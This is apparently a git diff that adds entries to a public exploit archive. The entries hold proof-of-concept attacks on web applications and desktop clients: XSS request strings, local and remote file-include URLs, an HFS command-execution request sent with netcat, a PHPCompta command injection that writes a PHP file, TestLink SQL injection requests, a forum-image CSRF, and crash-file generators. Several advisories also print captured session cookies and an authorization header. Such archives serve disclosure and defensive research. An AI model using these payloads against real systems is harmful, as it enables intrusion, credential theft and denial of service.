+ diff --git a/platforms/php/webapps/34841.txt b/platforms/php/webapps/34841.txt new file mode 100755 index 000000000..83c21d71f --- /dev/null +++ b/platforms/php/webapps/34841.txt @@ -0,0 +1,73 @@ +source: http://www.securityfocus.com/bid/44069/info + +PluXml is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +PluXml 5.0.1 is vulnerable; prior versions may also be affected. + +
+ + + + + + + +
+ + + + + +
+ + +
+ + + + + +
+ + + + + + + + + + + + + + + + + + +
+ + + + +
+ + + + + + + +
+ diff --git a/platforms/php/webapps/34842.txt b/platforms/php/webapps/34842.txt new file mode 100755 index 000000000..1aa6ea699 --- /dev/null +++ b/platforms/php/webapps/34842.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44103/info + +TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to TWiki 5.0.1 are vulnerable. + +GET /twiki/bin/view?rev=%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34843.txt b/platforms/php/webapps/34843.txt new file mode 100755 index 000000000..c71a3fb8a --- /dev/null +++ b/platforms/php/webapps/34843.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44103/info + +TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to TWiki 5.0.1 are vulnerable. + +GET /twiki/bin/login?origurl=&ANYTHING%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34845.txt b/platforms/php/webapps/34845.txt new file mode 100755 index 000000000..6f6161626 --- /dev/null +++ b/platforms/php/webapps/34845.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44136/info + +PHP Photo Vote is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +PHP Photo Vote 1.3F is vulnerable; other versions may also be affected. + +http://www.example.com/demo/photovote/login.php?page="> \ No newline at end of file diff --git a/platforms/php/webapps/34847.txt b/platforms/php/webapps/34847.txt new file mode 100755 index 000000000..3ef966a8b --- /dev/null +++ b/platforms/php/webapps/34847.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/44142/info + +PHP Easy Shopping Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +PHP Easy Shopping Cart 3.1R is vulnerable; others versions may also be affected. + +http://example.com/subitems.php?id=[NB]&name=[XSS] + +http://example.com/demo/plant/subitems.php?id=16&name="> diff --git a/platforms/php/webapps/34849.txt b/platforms/php/webapps/34849.txt new file mode 100755 index 000000000..795d2410a --- /dev/null +++ b/platforms/php/webapps/34849.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/44165/info + +AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible. + +AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00 + +http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt? \ No newline at end of file diff --git a/platforms/php/webapps/34850.txt b/platforms/php/webapps/34850.txt new file mode 100755 index 000000000..45d65496c --- /dev/null +++ b/platforms/php/webapps/34850.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/44169/info + +eXV2 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +eXV2 CMS 2.10 is vulnerable; other versions may also be affected. + +http://www.example.com/manual/caferss/example.php?rssfeedURL="%20onmouseover=prompt(1)%20xss="&submit=OK +http://www.example.com/modules/news/archive.php?subm="> +http://www.example.com/modules/news/topics.php?subm="> +http://www.example.com/modules/contact/index.php?op=contact&subm="> \ No newline at end of file diff --git a/platforms/php/webapps/34852.txt b/platforms/php/webapps/34852.txt new file mode 100755 index 000000000..bcf5db43e --- /dev/null +++ b/platforms/php/webapps/34852.txt @@ -0,0 +1,44 @@ +========================================================== +HTTP File Server 2.3a - 2.3b - 2.3c Remote Command Execution + +# Author : Daniele Linguaglossa +# Date: 30/09/2014 +# Remote: Yes +# Vendor Homepage: http://rejetto.com/ +# Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip +# CVE: CVE-2014-7226 +# Vendor Hompage: http://www.rejetto.com +# Tested on: Windows 8 +# Version: 2.3a - 2.3b - 2.3c + +The latest HTTP File Server (2.3c and maybe prior too) was found to be +vulnerable to a remote command execution in the file comment features , +because the application did not properly validate uft-8 broken byte +representation, in fact during parsing program won't notice that there are +multiple invalid representation and when they are printed into the page +will get replaced with one of these characters " { . | } " causing a macro +to be executed. +========================================================== +PoC +========================================================== +bug-utf8.txt +========================================================== +POST /upload/?mode=section&id=ajax.comment HTTP/1.1 +Connection: Close +Content-Type:application/x-www-form-urlencoded + +text=%c1%bb%c0%aeexec%c1%bccmd%c0%ae%c1%bd&files=x +========================================================== + +Copy the following on a file called bug-utf8.txt , then open hfs and add a +folder called upload, +it will ask if anyone should have upload permission click yes then with +netcat do the following: + +nc localhost 8080 < bug-utf8.txt + +if everything was fine you should see a new command prompt being executed +from hfs. + +========================================================== +EOF diff --git a/platforms/php/webapps/34854.txt b/platforms/php/webapps/34854.txt new file mode 100755 index 000000000..c1538ac41 --- /dev/null +++ b/platforms/php/webapps/34854.txt @@ -0,0 +1,368 @@ +Document Title: +=============== +All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1325 + + +Release Date: +============= +2014-09-29 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1327 + + +Common Vulnerability Scoring System: +==================================== +3.3 + + +Product & Service Introduction: +=============================== +WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a +security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website +security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces +security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security +practices and techniques. + +(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin. + + +Vulnerability Disclosure Timeline: +================================== +2014-09-29: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Github +Product: All In One Security & Firewall - Wordpress Plugin 3.8.3 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin. +The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service. + +The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module. +Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service. +The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent). +The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section +next to the input field context that gets displayed again. + +The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module. +Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service. +The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent). +The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section +next to the input field context that gets displayed again. + +The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2. +Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction. +Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious +sources and application-side manipulation of affected or connected module context. + + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Firewall - Detection 404 + [+] FileSystem Components > Host System +Vulnerable Parameter(s): + [+] 404 detection redirect url + [+] file name error logs url + +Affected Module(s): + [+] Firewall - Detection 404 + [+] FileSystem Components > Host System + + +Proof of Concept (PoC): +======================= +1.1 +The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or +medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and +steps below to continue. + +PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] ) + + + 404 Lockout Redirect URL: +<\"%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" /> + A blocked visitor will be automatically redirected to this URL. + + + + + + + +
+

+
+
+ + + +
+ +
+ + +
+
0 items +« + + of 0 + +»
+
+
+ + +--- PoC Session Logs [POST] (Firewall > 404 Detection) --- +Status: 200[OK] +POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html] + Request Header: + Host[www.vulnerability-db.com] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall] + Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] + Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] + Connection[keep-alive] + Response Header: + Server[nginx] + Date[Fri, 26 Sep 2014 17:40:21 GMT] + Content-Type[text/html; charset=UTF-8] + Content-Length[8095] + Connection[keep-alive] + Expires[Wed, 11 Jan 1984 05:00:00 GMT] + Cache-Control[no-cache, must-revalidate, max-age=0] + Pragma[no-cache] + X-Frame-Options[SAMEORIGIN] + X-Powered-By[PleskLin] + Vary[Accept-Encoding] + Content-Encoding[gzip] + +- +Status: 200[OK] +GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html] + Request Header: + Host[www.vulnerability-db.com] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6] + Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] + Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] + Connection[keep-alive] + Response Header: + Server[nginx] + Date[Fri, 26 Sep 2014 17:40:22 GMT] + Content-Type[text/html] + Content-Length[557] + Connection[keep-alive] + Last-Modified[Tue, 14 May 2013 13:05:17 GMT] + Etag["4ea065b-3c6-4dcad48e5901e"] + Accept-Ranges[bytes] + Vary[Accept-Encoding] + Content-Encoding[gzip] + X-Powered-By[PleskLin] + + + + +Reference(s): +/wp-admin/admin.php?page=aiowpsec_firewall +/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 +/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] +/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0 + + + + +1.2 +The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium +user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: FileSystem Components > Host System Logs + +
+

Please click the button below to view the latest system logs:

+ + + +
Enter System Log File Name: + " /> + Enter your system log file name. (Defaults to error_log) +
+
+ + + +
+ + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] + Request Header: + Host[www.vulnerability-db.com] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Content-Type[application/x-www-form-urlencoded; charset=UTF-8] + X-Requested-With[XMLHttpRequest] + Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4] + Content-Length[109] + Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] + Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] + Connection[keep-alive] + Pragma[no-cache] + Cache-Control[no-cache] + POST-Daten: + interval[60] + _nonce[176fea481c] + action[heartbeat] + screen_id[wp-security_page_aiowpsec_filesystem] + has_focus[false] + Response Header: + Server[nginx] + Date[Fri, 26 Sep 2014 17:53:44 GMT] + Content-Type[application/json; charset=UTF-8] + Transfer-Encoding[chunked] + Connection[keep-alive] + X-Robots-Tag[noindex] + x-content-type-options[nosniff] + Expires[Wed, 11 Jan 1984 05:00:00 GMT] + Cache-Control[no-cache, must-revalidate, max-age=0] + Pragma[no-cache] + X-Frame-Options[SAMEORIGIN] + X-Powered-By[PleskLin] + + + + +Status: 200[OK] +GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html] + Request Header: + Host[www.vulnerability-db.com] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4] + Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846] + Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=] + Connection[keep-alive] + Response Header: + Server[nginx] + Date[Fri, 26 Sep 2014 17:53:54 GMT] + Content-Type[text/html; charset=UTF-8] + Content-Length[6136] + Connection[keep-alive] + Expires[Wed, 11 Jan 1984 05:00:00 GMT] + Cache-Control[no-cache, must-revalidate, max-age=0] + Pragma[no-cache] + X-Frame-Options[SAMEORIGIN] + X-Powered-By[PleskLin] + Vary[Accept-Encoding] + Content-Encoding[gzip] + + + + +Reference(s): +/wp-admin/admin-ajax.php +/wp-admin/admin.php?page=aiowpsec_filesystem +/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 +/wp-content/plugins/all-in-one-wp-security-and-firewall/ +/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module. +The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module. +Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks. + + +Security Risk: +============== +The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/php/webapps/34858.txt b/platforms/php/webapps/34858.txt new file mode 100755 index 000000000..b76d76b7e --- /dev/null +++ b/platforms/php/webapps/34858.txt @@ -0,0 +1,43 @@ +# Exploit Title: RBS Change Complet Open Source CSRF +# Google Dork: intext:"une réalisation rbs" +# Date: 10/01/2014 +# Exploit Author: KrustyHack +# Vendor Homepage: http://www.rbschange.fr/ +# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html +# Version: 3.6.8 +# Tested on: Linux + +HOW TO +====== + +Just add [img="http://CSRF"][/img] on forum signature or forum posts. + +TEST +==== + +Based on demo.rbschange.fr: +--------------------------- + +[img="http://server/fr/deconnexion/"][/img] + +Will disconnect all users who load the image. + +Other example: +-------------- + +[img="http://www.example.com/log.php"][/img] + + + +To get users ip, user agent, ... \ No newline at end of file diff --git a/platforms/php/webapps/34861.txt b/platforms/php/webapps/34861.txt new file mode 100755 index 000000000..9138794cb --- /dev/null +++ b/platforms/php/webapps/34861.txt @@ -0,0 +1,30 @@ +Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS +CVE: CVE-2014-6389 +Vendor: PHPCompta +Product: PHPCompta/NOALYSS +Affected version: 6.7.1 5638 +Fixed version: 6.7.2 +Reported by: Jerzy Kramarz + +Details: + +PhpCompta 6.7.1-2 does not validate the syntax of the commands when processing backup requests from users. It is possible to abuse the 'd' parameter to inject additional parameters that will then be passed via the php passthru() function to create a backup file, which will subsequently be executed. The proof of concept below will create a file 'exploit.php' in the root directory of the application, which will execute phpinfo() function when called. + +GET /phpcompta/backup.php?sa=b&t=m&d=123;%20echo%20%22%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%22%20>%20exploit.php HTTP/1.1 +Host: 192.168.56.101 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3nckv75pburv54tm2iq79dfgl6 +Connection: keep-alive + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6389/ + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/php/webapps/34863.txt b/platforms/php/webapps/34863.txt new file mode 100755 index 000000000..3ede45c79 --- /dev/null +++ b/platforms/php/webapps/34863.txt @@ -0,0 +1,69 @@ +Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink +CVE: CVE-2014-5308 +Vendor: Testlink +Product: TestLink +Affected version: 1.9.11 +Fixed version: Fixed in SVN commit number 7a09973 +Reported by: Jerzy Kramarz + +Details: + +Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections: + +Vulnerability 1 (Fixed in commit #7a09973 in official repository) + +
+
+POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
+Host: 192.168.56.101
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
+Cookie: [...]
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 200
+
+CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=&search=Search%2FFilter
+
+
+ +Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository) + +
+
+POST /testlink/lib/events/eventinfo.php HTTP/1.1
+Content-Length: 6
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip,deflate
+Host: 192.168.56.101
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
+DNT: 1
+Connection: close
+Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
+Pragma: no-cache
+Cache-Control: no-cache
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}
+
+id=123
+
+
+ +Note:'Any user can create account for the application in 'testlink/firstLogin.php' page hence its possible to exploit aforementioned SQL injections without prior knowledge of the authentication details.' + +Further details at: + +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/ + + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/windows/dos/34855.pl b/platforms/windows/dos/34855.pl new file mode 100755 index 000000000..ed09c1aa1 --- /dev/null +++ b/platforms/windows/dos/34855.pl @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/44196/info + +ALPHA Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. + +ALPHA Player 2.4 is vulnerable; other versions may also be affected. + +=================================================== +ALPHA 2 Player Local Crash PoC +=================================================== +#Title: ALPHA 2 Player(.bmp) Local Crash PoC +#Author : anT!-Tr0J4n +#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com +#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m +#thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member +#Home : www.Dev-PoinT.com $ http://inj3ct0r.com +#Tested on: Windows XP sp3 +# http://alpha2player.com/ +================================================== + +#!/usr/bin/perl +print "| ALPHA.bmp Local Crash |\n"; +print "| Author: anT!-Tr0J4n |\n"; +print "| Greetz :http://inj3ct0r.com |\n"; +print "| www.Dev-PoinT.com |\n"; + + +my $junk= "\x41" x 240 ; +open(file,">crash.bmp"); +print file $junk ; +close(file); \ No newline at end of file diff --git a/platforms/windows/dos/34857.txt b/platforms/windows/dos/34857.txt new file mode 100755 index 000000000..70d15631c --- /dev/null +++ b/platforms/windows/dos/34857.txt @@ -0,0 +1,60 @@ +################################################################################################# +# +# Title : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability +# Severity : High+/Critical +# Reporter(s) : SpyEye & Christian Galeone +# Software Version : 3.0.14 & Previous Versions +# Software Name : TeamSpeak Client +# Software Download Link : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe +# Vendor Home : http://teamspeak.com/ +# Date(s) : 01/04/2014 - 0r161n4l c0d3 By SpyEye +# : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone +# Tested in : Win7 - TeamSpeak Client V3.0.14 +# CVE(s) : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone +# +################################################################################################## +# +# Effects: +# +# Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel) +# +# Note: +# +# The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect. +# +# PoC: +# +# 1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye +# +# CVE: CVE-2014-7221 +# +# [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] 